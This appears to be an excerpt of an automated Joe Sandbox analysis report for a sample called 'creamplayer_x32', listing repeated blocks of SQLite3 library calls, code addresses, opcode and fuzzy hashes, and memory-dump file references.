                                                                                                    • API ID: sqlite3_bind_int64$sqlite3_freesqlite3_resetsqlite3_step$sqlite3_column_int64sqlite3_mallocsqlite3_realloc$sqlite3_column_intsqlite3_initializesqlite3_mprintfsqlite3_mutex_leavesqlite3_prepare_v2
                                                                                                    • String ID:
                                                                                                    • API String ID: 961572588-0
                                                                                                    • Opcode ID: c724daf3936d67fd3e7a59374d144345718a9f8d9c21f3c7abba70c9fa35c0f4
                                                                                                    • Instruction ID: dba6eef834311e7f80380fc62c490a647dd1765b4da9a7e0a506f520bf28697a
                                                                                                    • Opcode Fuzzy Hash: c724daf3936d67fd3e7a59374d144345718a9f8d9c21f3c7abba70c9fa35c0f4
                                                                                                    • Instruction Fuzzy Hash: 9872F275A042298FDB24CF69C88078DB7F6FF98314F1586A9D889AB341D774AD81CF81
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                     • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                     • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                     • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                     • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                     • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                     • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_bind_int64sqlite3_mutex_leavesqlite3_stricmp
                                                                                                    • String ID: 2$foreign key$indexed
                                                                                                    • API String ID: 4126863092-702264400
                                                                                                    • Opcode ID: efb0247afb620838301bdf32ec29a55ffab8ab84c5461d6934eb6e15b590f11f
                                                                                                    • Instruction ID: 3d5d194cd292e354de8359ea213fef7e5121ae3f60f7d2d7ba557b44893e8b9c
                                                                                                    • Opcode Fuzzy Hash: efb0247afb620838301bdf32ec29a55ffab8ab84c5461d6934eb6e15b590f11f
                                                                                                    • Instruction Fuzzy Hash: 6BE1B374A142099FDB04CFA8D590A9DBBF2BFA9304F21C129E855AB754DB35ED82CF40
                                                                                                    APIs
                                                                                                    • sqlite3_bind_int64.SQLITE3 ref: 6094A72B
                                                                                                    • sqlite3_step.SQLITE3 ref: 6094A73C
                                                                                                    • sqlite3_column_blob.SQLITE3 ref: 6094A760
                                                                                                    • sqlite3_column_bytes.SQLITE3 ref: 6094A77C
                                                                                                    • sqlite3_malloc.SQLITE3 ref: 6094A793
                                                                                                    • sqlite3_reset.SQLITE3 ref: 6094A7F2
                                                                                                    • sqlite3_free.SQLITE3(?), ref: 6094A87C
                                                                                                      • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                     • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                     • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                     • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                     • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                     • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                     • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_bind_int64sqlite3_column_blobsqlite3_column_bytessqlite3_freesqlite3_mallocsqlite3_mutex_entersqlite3_resetsqlite3_step
                                                                                                    • String ID:
                                                                                                    • API String ID: 2794791986-0
                                                                                                    • Opcode ID: 324244e72ed1eb068e97444324dd06558e7f5640642cd65f7376e38a8826fd77
                                                                                                    • Instruction ID: 088d5e00ded46b3eb5457b54e5d33bc48436a4b712d77f6ae5dc1ca3eb859b7b
                                                                                                    • Opcode Fuzzy Hash: 324244e72ed1eb068e97444324dd06558e7f5640642cd65f7376e38a8826fd77
                                                                                                    • Instruction Fuzzy Hash: BE5110B5A042058FCB04CF69C48069ABBF6FF68318F158569E858AB345D734EC82CF90
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                     • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                     • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                     • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                     • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                     • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                     • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_stricmp
                                                                                                    • String ID: USING COVERING INDEX $DISTINCT$ORDER BY
                                                                                                    • API String ID: 912767213-1308749736
                                                                                                    • Opcode ID: 5e6ae8a77223c4cf3853263767bd84c2ef0a0cb2633a4755bdfaa367f33b2fd5
                                                                                                    • Instruction ID: 4f43644a9add5c5df618cbd47cd61ce2203d262f2077f605e752fe25420d36ab
                                                                                                    • Opcode Fuzzy Hash: 5e6ae8a77223c4cf3853263767bd84c2ef0a0cb2633a4755bdfaa367f33b2fd5
                                                                                                    • Instruction Fuzzy Hash: 2412D674A08268CFDB25DF28C880B5AB7B3AFA9314F1085E9E8899B355D774DD81CF41
                                                                                                    APIs
                                                                                                    • sqlite3_bind_int64.SQLITE3 ref: 6094B488
                                                                                                    • sqlite3_step.SQLITE3 ref: 6094B496
                                                                                                    • sqlite3_reset.SQLITE3 ref: 6094B4A4
                                                                                                    • sqlite3_bind_int64.SQLITE3 ref: 6094B4D2
                                                                                                    • sqlite3_step.SQLITE3 ref: 6094B4E0
                                                                                                    • sqlite3_reset.SQLITE3 ref: 6094B4EE
                                                                                                      • Part of subcall function 6094B54C: memmove.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,6094B44B), ref: 6094B6B5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_bind_int64sqlite3_resetsqlite3_step$memmove
                                                                                                    • String ID:
                                                                                                    • API String ID: 4082478743-0
                                                                                                    • Opcode ID: aa77e302053f557c70a8d8c80c1bb3ccc0b69d7e46be98bddd9db9cb48891f7f
                                                                                                    • Instruction ID: 9e7f29540a3c6f2d28ce6b101cd1a975f5529a8f599b89b7128c34d749e8d9ce
                                                                                                    • Opcode Fuzzy Hash: aa77e302053f557c70a8d8c80c1bb3ccc0b69d7e46be98bddd9db9cb48891f7f
                                                                                                    • Instruction Fuzzy Hash: DD41D2B4A087018FCB50DF69C484A9EB7F6EFA8364F158929EC99CB315E734E8418F51
                                                                                                    APIs
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 6094D354
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 6094D546
                                                                                                      • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905D8B
                                                                                                      • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905DA4
                                                                                                      • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905DB8
                                                                                                    • sqlite3_stricmp.SQLITE3 ref: 6094D3DA
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_stricmp$sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                    • String ID: BINARY$INTEGER
                                                                                                    • API String ID: 317512412-1676293250
                                                                                                    • Opcode ID: a7efc97792d1e6a4bc5cda92ab6d03f9066f32250883ff14ac0274f07e3e06bf
                                                                                                    • Instruction ID: cace79839434994537c0410bddb438ad3d501bddbf1b20fcc6a8a8bdb5da7fdd
                                                                                                    • Opcode Fuzzy Hash: a7efc97792d1e6a4bc5cda92ab6d03f9066f32250883ff14ac0274f07e3e06bf
                                                                                                    • Instruction Fuzzy Hash: 8E712978A056099BDB05CF69C49079EBBF2BFA8308F11C529EC55AB3A4D734E941CF80
                                                                                                    APIs
                                                                                                    • sqlite3_bind_int64.SQLITE3 ref: 6094B582
                                                                                                    • sqlite3_step.SQLITE3 ref: 6094B590
                                                                                                    • sqlite3_column_int64.SQLITE3 ref: 6094B5AD
                                                                                                    • sqlite3_reset.SQLITE3 ref: 6094B5EE
                                                                                                    • memmove.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,6094B44B), ref: 6094B6B5
                                                                                                    Similarity
                                                                                                    • API ID: memmovesqlite3_bind_int64sqlite3_column_int64sqlite3_resetsqlite3_step
                                                                                                    • String ID:
                                                                                                    • API String ID: 2802900177-0
                                                                                                    • Opcode ID: f7dd783d858009ac2aa36dfb06bc3a4e86bc75c1920f7d1bf53ec4d0fe99899e
                                                                                                    • Instruction ID: fa681a173a9aa7ad5377a8f3376375fc0286f70c891b696e42c92f52458a3a0e
                                                                                                    • Opcode Fuzzy Hash: f7dd783d858009ac2aa36dfb06bc3a4e86bc75c1920f7d1bf53ec4d0fe99899e
                                                                                                    • Instruction Fuzzy Hash: 0B517D75A082018FCB14CF69C48169EF7F7FBA8314F25C669D8499B318EA74EC81CB81
                                                                                                    APIs
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 6093F443
                                                                                                      • Part of subcall function 60904396: sqlite3_mutex_try.SQLITE3(?,?,?,60908235), ref: 609043B8
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 6093F45C
                                                                                                      • Part of subcall function 60939559: memcmp.MSVCRT ref: 60939694
                                                                                                      • Part of subcall function 60939559: memcmp.MSVCRT ref: 609396CA
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 6093F8CD
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 6093F8E3
                                                                                                    Similarity
                                                                                                    • API ID: memcmpsqlite3_mutex_entersqlite3_mutex_leave$sqlite3_mutex_try
                                                                                                    • String ID:
                                                                                                    • API String ID: 4038589952-0
                                                                                                    • Opcode ID: 29e5932b9866e1e5e2fcd92ac707fe98724786dada8c9b11deae4621e05e1fb7
                                                                                                    • Instruction ID: 916146ddc5613ce70bfe97dc7fabc38680eb49f4f4fdba01105907ea2da9c682
                                                                                                    • Opcode Fuzzy Hash: 29e5932b9866e1e5e2fcd92ac707fe98724786dada8c9b11deae4621e05e1fb7
                                                                                                    • Instruction Fuzzy Hash: 87F13674A046158FDB18CFA9C590A9EB7F7AFA8308F248429E846AB355D774EC42CF40
                                                                                                    APIs
                                                                                                      • Part of subcall function 6094A894: sqlite3_bind_int64.SQLITE3 ref: 6094A8C0
                                                                                                      • Part of subcall function 6094A894: sqlite3_step.SQLITE3 ref: 6094A8CE
                                                                                                      • Part of subcall function 6094A894: sqlite3_column_int64.SQLITE3 ref: 6094A8E9
                                                                                                      • Part of subcall function 6094A894: sqlite3_reset.SQLITE3 ref: 6094A90F
                                                                                                    • sqlite3_bind_int64.SQLITE3 ref: 6094C719
                                                                                                    • sqlite3_step.SQLITE3 ref: 6094C72A
                                                                                                    • sqlite3_reset.SQLITE3 ref: 6094C73B
                                                                                                      • Part of subcall function 6094B54C: memmove.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,6094B44B), ref: 6094B6B5
                                                                                                      • Part of subcall function 6094A9F5: sqlite3_free.SQLITE3 ref: 6094AA7A
                                                                                                    • sqlite3_free.SQLITE3 ref: 6094C881
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_bind_int64sqlite3_freesqlite3_resetsqlite3_step$memmovesqlite3_column_int64
                                                                                                    • String ID:
                                                                                                    • API String ID: 3487101843-0
                                                                                                    • Opcode ID: 5f7c6ccdcb237f7a487fb09799aacf08d073da1bf61c53431d7ccff799043987
                                                                                                    • Instruction ID: dadb85a3919e548a164012fc2e04d9b0ab11445217433cc10b515e99a95ed5c3
                                                                                                    • Opcode Fuzzy Hash: 5f7c6ccdcb237f7a487fb09799aacf08d073da1bf61c53431d7ccff799043987
                                                                                                    • Instruction Fuzzy Hash: 3681FA74A046098FCB44DF99C480A9DF7F7AFA8354F258529E855AB314EB34EC46CF90
                                                                                                    APIs
                                                                                                      • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                                      • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                                      • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                                                    • sqlite3_bind_int.SQLITE3 ref: 6096A3DE
                                                                                                      • Part of subcall function 609256E5: sqlite3_bind_int64.SQLITE3 ref: 60925704
                                                                                                    • sqlite3_column_int.SQLITE3 ref: 6096A3F3
                                                                                                    • sqlite3_step.SQLITE3 ref: 6096A435
                                                                                                    • sqlite3_reset.SQLITE3 ref: 6096A445
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_bind_intsqlite3_bind_int64sqlite3_column_intsqlite3_freesqlite3_mprintfsqlite3_prepare_v2sqlite3_resetsqlite3_step
                                                                                                    • String ID:
                                                                                                    • API String ID: 247099642-0
                                                                                                    • Opcode ID: 64427881e425bd4a7d2fa305579facb0dd1ab8a71ce9f1271cd8f49c57a97bec
                                                                                                    • Instruction ID: 69535c0605dcb565d56369453fd68d3a3097adfd173720c6e67b3d4aca8354ad
                                                                                                    • Opcode Fuzzy Hash: 64427881e425bd4a7d2fa305579facb0dd1ab8a71ce9f1271cd8f49c57a97bec
                                                                                                    • Instruction Fuzzy Hash: FF2151B0A143148BEB109FA9D88479EB7FAEF64308F00852DE89597350EBB8D845CF51
                                                                                                    APIs
                                                                                                      • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                                      • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                                      • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                                                    • sqlite3_bind_int64.SQLITE3 ref: 6096A322
                                                                                                      • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                                                    • sqlite3_step.SQLITE3 ref: 6096A32D
                                                                                                    • sqlite3_column_int.SQLITE3 ref: 6096A347
                                                                                                      • Part of subcall function 6091D4F4: sqlite3_value_int.SQLITE3 ref: 6091D50C
                                                                                                    • sqlite3_reset.SQLITE3 ref: 6096A354
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_bind_int64sqlite3_column_intsqlite3_freesqlite3_mprintfsqlite3_mutex_leavesqlite3_prepare_v2sqlite3_resetsqlite3_stepsqlite3_value_int
                                                                                                    • String ID:
                                                                                                    • API String ID: 326482775-0
                                                                                                    • Opcode ID: de94f0bba3b8b54078f1ceecce583a965f8e010bb36370f6070bcd8bc28ee8b0
                                                                                                    • Instruction ID: 7c1586c82cd56d85cf32929a5cd575737867df940847ca2bf63216634e784e33
                                                                                                    • Opcode Fuzzy Hash: de94f0bba3b8b54078f1ceecce583a965f8e010bb36370f6070bcd8bc28ee8b0
                                                                                                    • Instruction Fuzzy Hash: 0E214DB0A043049BDB04DFA9C480B9EF7FAEFA8354F04C429E8959B340E778D8418B51
                                                                                                    APIs
                                                                                                    • sqlite3_bind_int64.SQLITE3 ref: 6094B71E
                                                                                                      • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                                                    • sqlite3_bind_int64.SQLITE3 ref: 6094B73C
                                                                                                    • sqlite3_step.SQLITE3 ref: 6094B74A
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_bind_int64$sqlite3_mutex_leavesqlite3_step
                                                                                                    • String ID:
                                                                                                    • API String ID: 3305529457-0
                                                                                                    • Opcode ID: dc92f9052f14c19b23696c87723feab2593fd922d888b89f432a916288e70c30
                                                                                                    • Instruction ID: cea3564161c85327b61b62d60446574847d05a2bcfebeda4641ea5396b37aa5a
                                                                                                    • Opcode Fuzzy Hash: dc92f9052f14c19b23696c87723feab2593fd922d888b89f432a916288e70c30
                                                                                                    • Instruction Fuzzy Hash: D401A8B45047049FCB00DF19D9C968ABBE5FF98354F158869FC888B305D374E8548BA6
                                                                                                    APIs
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 6090C1EA
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 6090C22F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                    • String ID:
                                                                                                    • API String ID: 1477753154-0
                                                                                                    • Opcode ID: 8c595cf50166d2d57a1b46d7a61a8743a20f226779b5cb212a2500e19f50b056
                                                                                                    • Instruction ID: fc120f7ed3300d8301d0f99cb769197b575d5683181bd6b289e4b53452841bc5
                                                                                                    • Opcode Fuzzy Hash: 8c595cf50166d2d57a1b46d7a61a8743a20f226779b5cb212a2500e19f50b056
                                                                                                    • Instruction Fuzzy Hash: 6501F4715042548BDB449F2EC4C576EBBEAEF65318F048469DD419B326D374D882CBA1
                                                                                                    APIs
                                                                                                      • Part of subcall function 6092535E: sqlite3_log.SQLITE3 ref: 60925406
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 609255B2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                                    • String ID:
                                                                                                    • API String ID: 1465156292-0
                                                                                                    • Opcode ID: 61f2b65abbb078f396bfa931b2809e4962fa985140118a0fa907d432528e7d54
                                                                                                    • Instruction ID: 19c4c58ecb434a21204d9b38047e93a23a7f28015e8477a734fda6841bb58fe8
                                                                                                    • Opcode Fuzzy Hash: 61f2b65abbb078f396bfa931b2809e4962fa985140118a0fa907d432528e7d54
                                                                                                    • Instruction Fuzzy Hash: 56317AB4A082188FCB04DF69D880A8EBBF6FF99314F008559FC5897348D734D940CBA5
                                                                                                    APIs
                                                                                                      • Part of subcall function 6092535E: sqlite3_log.SQLITE3 ref: 60925406
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 60925508
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                                    • String ID:
                                                                                                    • API String ID: 1465156292-0
                                                                                                    • Opcode ID: 7f15987c0945e0fd4273a36fcce91cc0d916abb620506d2e7fdad6d0c82ef640
                                                                                                    • Instruction ID: ad89f0bb34aa7175efe61e1ac22fb0c12735e6005c3b9edbf096fd229bca234b
                                                                                                    • Opcode Fuzzy Hash: 7f15987c0945e0fd4273a36fcce91cc0d916abb620506d2e7fdad6d0c82ef640
                                                                                                    • Instruction Fuzzy Hash: 5A01A475B107148BCB109F2ACC8164BBBFAEF68254F05991AEC41DB315D775ED458BC0
                                                                                                    APIs
                                                                                                      • Part of subcall function 6092535E: sqlite3_log.SQLITE3 ref: 60925406
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                                    • String ID:
                                                                                                    • API String ID: 1465156292-0
                                                                                                    • Opcode ID: ebbe32869a67294cb2d54c108597a832b3743d43329dcf341f64f2493053d601
                                                                                                    • Instruction ID: 4fd0dfe8dd6226820e052206e0db6187a6d8a97f2116fb4a305c2fd2856f8961
                                                                                                    • Opcode Fuzzy Hash: ebbe32869a67294cb2d54c108597a832b3743d43329dcf341f64f2493053d601
                                                                                                    • Instruction Fuzzy Hash: 94F08CB5A002099BCB00DF2AD88088ABBBAFF98264B05952AEC049B314D770E941CBD0
                                                                                                    APIs
                                                                                                      • Part of subcall function 6092535E: sqlite3_log.SQLITE3 ref: 60925406
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 60925678
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                                    • String ID:
                                                                                                    • API String ID: 1465156292-0
                                                                                                    • Opcode ID: 20ce1548f611e36a3668a48b9975394e1a388ab84833d9cb320a678b216caf11
                                                                                                    • Instruction ID: bc2fa39936d9f4ed0ba1ebf98b65e017ff83ed2bbf5e058a49948814e7f33c49
                                                                                                    • Opcode Fuzzy Hash: 20ce1548f611e36a3668a48b9975394e1a388ab84833d9cb320a678b216caf11
                                                                                                    • Instruction Fuzzy Hash: 59E0EC74A042089BCB04DF6AD4C194AB7F9EF58258B14D665EC458B309E231E9858BC1
                                                                                                    APIs
                                                                                                    • sqlite3_bind_int64.SQLITE3 ref: 60925704
                                                                                                      • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_bind_int64sqlite3_mutex_leave
                                                                                                    • String ID:
                                                                                                    • API String ID: 3064317574-0
                                                                                                    • Opcode ID: 8bfbb127be37b3944cf6aee767a60d103abce584902525ba566a621f413e0d82
                                                                                                    • Instruction ID: 7a9bf9350bb0d435b7485bd9c083abc2dab3a9c90cc7cce47300d03dda88f0d0
                                                                                                    • Opcode Fuzzy Hash: 8bfbb127be37b3944cf6aee767a60d103abce584902525ba566a621f413e0d82
                                                                                                    • Instruction Fuzzy Hash: FFD092B4909309AFCB00EF29C48644EBBE5AF98258F40C82DFC98C7314E274E8408F92
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
